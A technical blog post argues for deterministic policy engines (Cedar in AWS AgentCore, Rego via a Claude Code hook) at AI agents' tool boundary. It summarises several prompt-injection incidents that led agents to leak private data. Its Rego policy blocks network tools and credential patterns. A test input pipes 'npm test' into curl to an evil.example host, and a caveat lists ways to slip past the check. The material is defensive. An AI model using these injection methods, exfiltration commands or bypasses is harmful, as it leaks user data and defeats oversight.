Policy as Code for AI Agents in 2026: Cedar at the Gateway, Rego in the Hook, and the 11.2% the Model Still Lets Through
Every microVM I run for an agent on PandaStack, the Firecracker platform I build and operate (my company, so weigh what follows accordingly), answers one question well: what can this process reach. It does not answer the question that matters once the agent is inside: should this particular tool call, with these arguments, on behalf of this user, happen at all. For two years the industry's answer to the second question has been "the model will know", with a classifier bolted on in front. This post is a ledger of why that stopped being acceptable in 2026, what the policy engines look like a year after their founders left, what AWS, Anthropic and OpenAI ship at the tool boundary, and a Rego policy I ran this week to show the deterministic layer is a day of work, not a research problem.
The injections kept landing
The incident list is what changed the argument. On 26 May 2025 Invariant Labs showed a GitHub issue in a public repository steering Claude 4 Opus, through the official GitHub MCP server, into reading a private repository and publishing its contents in a pull request. Microsoft 365 Copilot's EchoLeak, CVE-2025-32711, was a zero-click exfiltration from a single email that, per the write-up, walked past Microsoft's XPIA injection classifier, its link redaction and its content security policy. Noma's ForcedLeak against Salesforce Agentforce, disclosed on 25 September 2025 at CVSS 9.4, planted instructions in a Web-to-Lead description field and exfiltrated CRM data to an expired domain still on Salesforce's allowlist, bought for five dollars. Brave demonstrated on 20 August 2025 that a Reddit comment could make Perplexity's Comet browser read the user's email and one-time code.
The vendors' own language followed. OpenAI's Atlas hardening post of 23 December 2025 says prompt injection "is unlikely to ever be fully 'solved'" and that its nature "makes deterministic security guarantees challenging". Anthropic's Claude for Chrome post of August 2025 gave numbers most vendors keep private: across 123 test cases and 29 attack scenarios, autonomous-mode attack success fell from 23.6 percent to 11.2 percent after mitigations, and a browser-specific class from 35.7 percent to zero. Google's April 2026 sweep of Common Crawl found injections in the wild in six categories, with a 32 percent relative increase in the malicious category between November 2025 and February 2026. Eleven percent is a good result for a model. It is a terrible result for an access control.
What a classifier promises
Google's June 2025 layered defence is the honest template: injection content classifiers, "security thought reinforcement" in the prompt, markdown sanitisation and URL redaction, a user confirmation framework, and notifications. Two of the five, the classifier and the reinforcement, are probabilistic; the URL redaction and the confirmation step are rules. EchoLeak is the case study: the classifier failed and the deterministic layers had gaps an attacker could enumerate.
The guardrail market consolidated on the classifier side. Check Point announced its acquisition of Lakera on 16 September 2025 (reportedly about $300 million); SentinelOne announced Prompt Security on 5 August 2025 for cash and stock. Both inspect inputs and outputs at runtime and score them. In open source, NVIDIA's NeMo Guardrails (Apache-2.0, 0.24 line, Colang 2.0 still documented as beta) and Guardrails AI (Apache-2.0, validators from a hub) run on prompts and completions. OpenAI's Agents SDK has input, output and tool guardrails whose "tripwires" raise an exception and halt the run; input guardrails run in parallel with the agent by default, which tells you they are a detection, not a gate. Zenity and Noma describe inline enforcement on tool invocation, and Invariant, now part of Snyk, sells the "Guardrails" its GitHub disclosure recommended. All useful; none can promise that the same request gets the same answer tomorrow.
The engines, a year after the founders left
Open Policy Agent 1.0 shipped on 20 December 2024: if and contains became mandatory in rules, every and in work without imports, strict-mode checks became the default, and import rego.v1 became a no-op. v1.21.1 on 29 September 2026 is current, and v1.20 added and and or keywords. On 20 August 2025 the project's own note said the creators "along with many team members from Styra" had moved to Apple, that "Open Policy Agent remains a CNCF graduated open source project and there are no changes to the project governance or licensing", and that Styra's EOPA, OPA Control Plane, SDKs and Regal linter would go to the CNCF organisation. Whether Apple bought the company or only its people was never stated in a filing I could find. The follow-through is mixed: the EOPA repository was archived on 26 June 2026 with a request for new maintainers, while OPA itself is healthier than ever. Gatekeeper is on 3.23 from 9 July 2026.
Cedar, AWS's authorisation language, joined the CNCF as a Sandbox project on 8 October 2025. It is a smaller language than Rego by design: permit and forbid statements over principal, action, resource and context, default deny, forbid always wins, no ordering, Rust implementation, formal specification checked in Lean. Permit.io's cedar-agent, Apache-2.0, runs it standalone behind a /v1/is_authorized endpoint.
On the Kubernetes side the CEL transition is nearly over. ValidatingAdmissionPolicy went GA in 1.30 in April 2024; MutatingAdmissionPolicy is stable since 1.36, released 22 April 2026. Kyverno 1.15 in July 2025 added CEL-based policy types, and 1.19 on 20 August 2026 declared full feature parity, deprecated ClusterPolicy, and scheduled its removal for 1.20 around November. I mention Kubernetes on purpose. The admission-controller discipline platform teams spent five years building, a declarative policy evaluated at a boundary the workload cannot route around, versioned in git and tested in CI, is exactly the muscle agent tool calls need, and the same people usually own both problems.
Cedar at the gateway: what AgentCore Policy does
Amazon Bedrock AgentCore Policy went generally available on 3 March 2026 in thirteen regions, the clearest production example of the pattern. The AgentCore Gateway fronts MCP tools; a policy engine attached to the gateway intercepts every tools/call and, per the authorization flow docs, builds a Cedar request from two inputs: the caller's JWT, whose sub becomes the principal AgentCore::OAuthUser::"..." and whose claims become tags on it, and the tool call, whose name becomes the action AgentCore::Action::"RefundTool___process_refund" and whose arguments become context.input. The resource is the gateway ARN. Nothing in the request comes from the model's text. The documented example reads like this:
// AgentCore Policy, Cedar. Default deny: with no permit, every tool call fails.
// Allow the refund-agent identity to call process_refund, but only under 500.
permit (
principal is AgentCore::OAuthUser,
action == AgentCore::Action::"RefundTool___process_refund",
resource == AgentCore::Gateway::"arn:aws:bedrock-agentcore:us-west-2:123456789012:gateway/refund-gateway"
) when {
principal.hasTag("username") &&
principal.getTag("username") == "refund-agent" &&
context.input.amount < 500
};
// forbid wins over any permit, regardless of order: no refunds from other departments.
forbid (principal, action, resource) when {
principal.hasTag("department") &&
principal.getTag("department") != "finance"
};
I parsed and evaluated this policy with cedar-policy-cli 4.13.0 in the scratch directory for this post: amount 450 from the finance user returns ALLOW, 600 returns DENY, and a marketing-department user is denied at 450 by the forbid.
The AWS security blog's explanation of why Cedar is worth reading for one idea: because Cedar is analysable, you can let an LLM draft a policy from English and then have the analyser prove whether it is over-permissive, over-restrictive or unsatisfiable before it is enforced. The model writes the rule; the rule, not the model, is what runs. Since GA the product has added session-scoped temporal policies ("an approval was granted before a transfer", "no more than N calls this session", "running total under a budget") through a second language called Dogwood, and on 17 June 2026 it wired in Bedrock Guardrails so a prompt-attack score becomes one more attribute a deterministic policy can condition on. That is the right relationship between the two layers: the classifier emits a number, the policy decides.
Rego in the hook: what I ran this week
AgentCore is one gateway. The same shape works anywhere you can interpose on a tool call, and the cheapest place for a coding agent is the hook. I wrote the policy below in the scratch directory for this post against OPA 1.21.1; opa check --strict passes, the six tests in agent_tools_test.rego pass, and the three sample evaluations below are the real outputs.
# policy/agent_tools.rego (Rego v1 syntax, OPA 1.21.1)
# Decides one agent tool call: input = {subject, session, tool, arguments}.
package agent.tools
default allow := false
default result := {"allow": false, "reasons": ["no rule matched"]}
# 1. Read-only tools: any agent, no argument checks.
read_only := {"github.get_issue", "github.list_pull_requests", "web.search"}
allow if input.tool in read_only
# 2. Shell: allowlisted program, no network binaries anywhere in the line,
# cwd under the workspace. Coding agents only.
allow if {
input.tool == "shell.exec"
input.subject.role == "coding-agent"
argv := split(input.arguments.command, " ")
argv[0] in {"npm", "pytest", "go", "cargo"}
not has_network(argv)
startswith(input.arguments.cwd, "/workspace/")
}
has_network(argv) if {
some a in argv
a in {"curl", "wget", "nc", "ssh", "scp"}
}
# 3. Payments: human-approved session, cap, allowlisted recipient (from data/).
allow if {
input.tool == "payments.transfer"
input.subject.approval == "human"
input.arguments.currency == "USD"
input.arguments.amount <= 500
input.arguments.recipient in data.recipients.allowlisted
}
# Denies win over any allow (same shape as Cedar's forbid-overrides-permit).
deny contains msg if {
input.tool == "github.create_pull_request"
input.arguments.repo != input.session.repo
msg := sprintf("cross-repo write to %s; session is bound to %s",
[input.arguments.repo, input.session.repo])
}
deny contains msg if {
some k, v in input.arguments
is_string(v)
regex.match(`(AKIA[0-9A-Z]{16}|ghp_[A-Za-z0-9]{36}|-----BEGIN [A-Z ]*PRIVATE KEY-----)`, v)
msg := sprintf("argument %q carries something shaped like a credential", [k])
}
result := {"allow": true, "reasons": []} if {
allow
count(deny) == 0
}
result := {"allow": false, "reasons": deny} if count(deny) > 0
Wiring it into Claude Code is a PreToolUse hook, which the docs say fires before the permission check in every mode and whose deny holds "even in bypassPermissions mode or with --dangerously-skip-permissions". The matcher covers Bash and every MCP tool; the script reshapes the call and asks OPA.
// .claude/settings.json (project scope, committed): consult OPA before Bash and any MCP tool
{ "hooks": { "PreToolUse": [ { "matcher": "Bash|mcp__.*",
"hooks": [ { "type": "command", "command": "./hooks/opa-gate.sh" } ] } ] } }
#!/usr/bin/env bash
# hooks/opa-gate.sh: stdin = Claude Code's tool call JSON; stdout = the hook decision.
set -euo pipefail
CALL=$(cat)
REQ=$(jq -c --arg repo "${REPO:-acme/api}" '{
subject: {role: "coding-agent"},
session: {repo: $repo},
tool: (if .tool_name == "Bash" then "shell.exec"
else (.tool_name | sub("^mcp__"; "") | gsub("__"; ".")) end), # mcp__github__x -> github.x
arguments: (if .tool_name == "Bash" then {command: .tool_input.command, cwd: .cwd}
else .tool_input end)
}' <<<"$CALL")
OUT=$(opa eval -I -f raw -d policy/ 'data.agent.tools.result' <<<"$REQ")
if [ "$(jq -r .allow <<<"$OUT")" = "true" ]; then
echo '{"hookSpecificOutput":{"hookEventName":"PreToolUse","permissionDecision":"allow"}}'
else
jq -c '{hookSpecificOutput:{hookEventName:"PreToolUse",permissionDecision:"deny",
permissionDecisionReason:(.reasons|join("; "))}}' <<<"$OUT"
fi
Fed npm test the hook answered allow. Fed npm test && curl https://evil.example/x it answered deny with "no rule matched", because the network check removed the only allow. Fed mcp__github__create_pull_request against acme/public-site in a session bound to acme/api it answered deny with "cross-repo write to acme/public-site; session is bound to acme/api", which is the Invariant exploit, stopped by six lines. Two hundred cold opa eval processes took 2.6 seconds on my machine, about 13 milliseconds each, mostly process start; a long-running OPA behind a socket answers in well under a millisecond.
Now the caveats, which are the point. Splitting a shell line on spaces is not a parser; /usr/bin/curl, sh -c and a Python script that opens a socket all sail past it. Claude Code's own permissions page says the same about its rules: a Bash(curl *) deny "isn't a security boundary around the program" and the fix for network and filesystem is the sandbox, not pattern matching. So the division of labour is: the policy decides which tool, for which caller, with which semantic arguments (repository, recipient, amount, URL host); the sandbox decides which files and hosts any process can touch. Neither replaces the other, and a hook runs outside the sandbox.
What the coding agents ship
Claude Code's permission system has modes (default, acceptEdits, plan, auto with a classifier, bypassPermissions), rules evaluated deny then ask then allow with patterns like Bash(npm run *) and Read(./.env), managed settings an administrator can lock, and a sandbox that is off by default and uses Seatbelt on macOS and bubblewrap plus socat on Linux, with an egress proxy whose allowlist starts empty. OpenAI's Codex documents three sandbox modes, read-only, workspace-write and danger-full-access, with approval policies on-request, never and a granular object (the old untrusted is retired), enforced with sandbox-exec Seatbelt profiles on macOS and bwrap plus seccomp on Linux, network off unless [sandbox_workspace_write] network_access = true. Cursor's security page offers run modes "from a simple allowlist to the Auto-review classifier" and calls them "best-effort guardrails rather than a hard security boundary". Windsurf's terminal-policy page now redirects to Cognition's domain and 404s, so it is left out.
The MCP 2026-07-28 authorization spec is good OAuth 2.1 hygiene: servers MUST publish RFC 9728 protected-resource metadata, clients MUST send the RFC 8707 resource parameter, servers MUST validate audience and "MUST NOT accept or transit any other tokens", with step-up scope challenges on a 403. What it is not is tool-level authorisation: scopes are per server, and whether process_refund under 500 is allowed for this user is left to the server or a gateway in front of it. That gap is where AgentCore Policy, cedar-agent or an OPA sidecar sit, and it is the gap I described in MCP Security in 2026.
| Layer or product | Evaluates | Enforced where | Deterministic | Status, 2026 | Source |
|---|---|---|---|---|---|
| OPA / Rego | any JSON: subject, tool, arguments, data | sidecar, library, hook, gateway | yes | 1.0 on 20 Dec 2024; v1.21.1 on 29 Sep 2026; CNCF graduated | releases |
| Cedar via AgentCore Policy | JWT claims, tool name, tool input, session history | AgentCore Gateway, before the MCP tool runs | yes, default deny, forbid wins | GA 3 Mar 2026, 13 regions; Guardrails signal 17 Jun 2026 | AWS |
| Kyverno CEL, VAP, MAP | Kubernetes admission objects | API server or webhook | yes | VAP GA 1.30; MAP stable 1.36 (22 Apr 2026); Kyverno 1.19 deprecates ClusterPolicy | Kyverno |
| Claude Code rules and PreToolUse hooks | tool name, tool input, command text | before the permission prompt, every mode | hooks yes; Bash rules match text, not binaries | hook deny holds in bypassPermissions; sandbox off by default | docs |
| Codex sandbox and approvals | filesystem, network, approval policy | OS: Seatbelt, bwrap plus seccomp | yes | read-only / workspace-write / danger-full-access; network off by default | docs |
| MCP authorization | token audience, per-server scopes | HTTP transport | yes, server-level only | spec 2026-07-28: RFC 9728 and RFC 8707 MUST | spec |
| Injection classifiers (Lakera, Prompt Security, Bedrock Guardrails, NeMo) | prompt and tool I/O content | in front of the model or at a gateway | no, a score | Lakera to Check Point 16 Sep 2025; Prompt Security to SentinelOne 5 Aug 2025 | Check Point |
Four layers and what each one stops
The figure is the argument in one picture. Model hardening and classifiers lower the odds that a bad tool call is proposed; policy and sandboxing bound what it can do when proposed anyway. Every incident above was one where the left two layers failed and the right two had a hole: the GitHub agent had two repositories in scope and no rule binding the session to one, Agentforce had an expired domain on an allowlist nobody re-validated, Comet had no rule that OTP retrieval requires the human. Salesforce's fix was not a better classifier; it was "Trusted URLs Enforcement", a deterministic allowlist. Brave's recommendation was not a better model; it was that "the model should require explicit user interaction for security and privacy-sensitive tasks", which is a policy. It is the lesson I keep relearning on the isolation side: the boundary must be enforced by something the workload cannot talk to.
What you will be audited against
The frameworks caught up. The OWASP GenAI project published its Top 10 for Agentic Applications on 9 December 2025 with more than 100 contributors; the entries are ASI01 Agent Goal Hijack, ASI02 Tool Misuse and Exploitation, ASI03 Identity and Privilege Abuse, ASI04 Agentic Supply Chain Vulnerabilities, ASI05 Unexpected Code Execution, ASI06 Memory and Context Poisoning, ASI07 Insecure Inter-Agent Communication, ASI08 Cascading Failures, ASI09 Human-Agent Trust Exploitation and ASI10 Rogue Agents. A deterministic policy at the tool boundary is the primary control for ASI02 and ASI03 and a compensating control for ASI01 and ASI05. The Cloud Security Alliance's MAESTRO model from February 2025 names "Agent Tool Misuse" at its ecosystem layer, and NIST's AI Agent Standards Initiative, launched 17 February 2026 with an RFI on agent security and an NCCoE identity project, connects to the non-human identity question: a Cedar principal is only as good as the token behind it.
What I take from all this. The model is the user; it will be socially engineered, and the vendors who build the models now say so in writing. The classifier is a smoke detector, worth having and not a lock. The lock is a policy evaluated at the tool boundary from inputs the model cannot author, next to a sandbox that limits what any process can reach, and both are off-the-shelf in 2026: Cedar in AgentCore if you are on AWS, OPA or cedar-agent anywhere else, hooks in the coding agents, CEL in the cluster. This quarter I am putting an OPA decision in front of every MCP tool my own agents can call, binding each session to one repository and one spend cap, turning the Claude Code sandbox on with an explicit domain list, and writing the tests before the rules. None of that needed a research breakthrough. It needed the discipline platform teams already had, pointed at a new boundary.
Related: MCP Security in 2026: The Protocol Got Hardened. The Ecosystem Didn't., Isolation Is Not an Abuse Control: Lessons From My Fleet and Who Is This Agent? Non-Human Identity in 2026.
I'm Ajay Kumar — I build and operate PandaStack, an open-source Firecracker microVM cloud for AI agents. Everything above comes from running it in production.
Need this kind of infrastructure work? See what I do or email hello@ajayk.sh.
Related
AI SOC Agents in 2026: 98% Accuracy Claims, 23 to 34% on the Benchmark, and 0% of Teams Letting Them Act Alone
What the security-operations agents from Microsoft, Google, CrowdStrike, Palo Alto, SentinelOne, Torq and a billion-dollar startup cohort actually do in 2026 and what is measured: a median of 100 alerts a day and 28 percent never investigated, 75-minute mean investigations, Microsoft's $4-an-hour compute units and Google's token meter, CrowdStrike's 98 percent triage claim against Meta's 23 to 34 percent benchmark, Anthropic's and Google's reports of attackers running agents against defenders, and a Sigma rule and CI step that keep a human on the merge button.
14 minSep 9, 2026Agent-to-Agent Protocols in 2026: A2A Reached 1.0, Three ACPs Died or Merged, and MCP Learned to Do Most of the Same Job
What Google's Agent2Agent protocol actually specifies at v1.0, what changed when it moved into the Agentic AI Foundation in August, which vendors have shipped it versus announced it, how MCP's July 2026 revision reproduced A2A's task lifecycle almost state for state, the first real CVE on an A2A surface, what the production data says about how rare multi-hop agent systems are, and a working server and client on the 1.1 SDK with the breaking changes listed.
14 minSep 7, 2026Who Is This Agent? Non-Human Identity in 2026, From the RFCs to the Breaches
Machines outnumber humans 109 to 1 in the enterprise directory, the OAuth working group has 70 drafts in flight, MCP just deprecated dynamic registration, and an agent with an over-scoped token deleted a production database in nine seconds. What actually standardised this year, what shipped, and the delegation chain I would build.
16 min